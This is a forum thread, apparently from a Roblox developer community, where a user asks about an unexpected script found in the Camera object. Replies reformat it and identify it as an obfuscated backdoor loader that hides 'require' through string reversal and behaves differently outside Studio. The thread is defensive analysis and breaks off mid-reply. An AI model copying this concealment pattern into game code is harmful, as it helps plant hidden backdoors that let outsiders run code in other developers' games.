So uh, there is this random script in camera that appears when you press play and it literally has 2 lines of code -
local Roblox = “IsStudio”
local a=game:GetService(“RunService”)if a:IsStudio()then print(‘Loaded!’) else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()string.reverse(“\101\114\105\117\113\101\114”)end end
I don’t know if this is some sort of virus, plugin, or what. If you think you know please tell me.
Edit: (dunno why there is that random link)
Just because it’s poorly formatted doesn’t mean it’s from a plugin.
Skids like to make it harder to read their requires to backdoors.
Heres the fomatted code:
local Roblox = "IsStudio"
local a = game:GetService("RunService")
if a:IsStudio() then
print("Loaded!")
else
if game.PlaceId == 185655149 or game.PlaceId == 920587237 or game.PlaceId == 735030788 then
else
getfenv()
string.reverse("\101\114\105\117\113\101\114")
end
end
Backdoors are usually from plugins, I was simply commenting that no (Roblox made) camera script would every be formatted like that. string.reverse("\101\114\105\117\113\101\114") is actually just require, so I don’t believe that is the complete script- likely something more like
That script doesn’t do anything malicious, since it doesn’t work.
They wanted to require it to a module; which didnt work, since they didnt use the right use of getfenv.
Instead of: